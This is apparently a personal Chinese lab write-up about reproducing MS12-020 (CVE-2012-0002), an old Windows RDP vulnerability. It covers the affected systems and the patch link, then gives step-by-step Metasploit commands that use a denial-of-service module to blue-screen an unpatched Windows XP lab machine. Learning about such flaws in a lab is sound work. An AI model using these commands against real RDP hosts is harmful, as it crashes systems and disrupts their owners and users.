正好这几天不忙,就想着慢慢学习,再写点简单的东西,进行总结记录。
这次尝试的是MS12-020,可导致BSOD(死亡蓝屏)
MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,
远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,然后控制系统。
CVE ID: CVE-2012-0002
影响范围:开了RDP的Microsoft Windows XP Professional /Microsoft Windows XP Home/ Microsoft Windows Server 2003 Standard Edition /Microsoft Windows Server 2003 Enterprise Edition /Microsoft Windows Server 2003 Datacenter Edition /Microsoft Windows 7(绿盟说是影响全版本windows系统,当时win8和win10还未出)
补丁地址:https://technet.microsoft.com/library/security/ms12-020
首先确定kali为攻击机,windows xp professional service park 2为靶机。当然,开启了远程桌面,也没打补丁。
接下来,打开msfconsole,输入命令search ms12-020
可选择的模块有2个,我们先选择第一个进行。尝试。
输入命令:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 然后回车
进入这个模块后,查看当下的配置。
show options
然后设置靶机IP。
set RHOST 192.168.19.130
最后,输入run,回车运行。
当提示seems down时,查看靶机情况。
如图所示,RPDWD.SYS引起的蓝屏。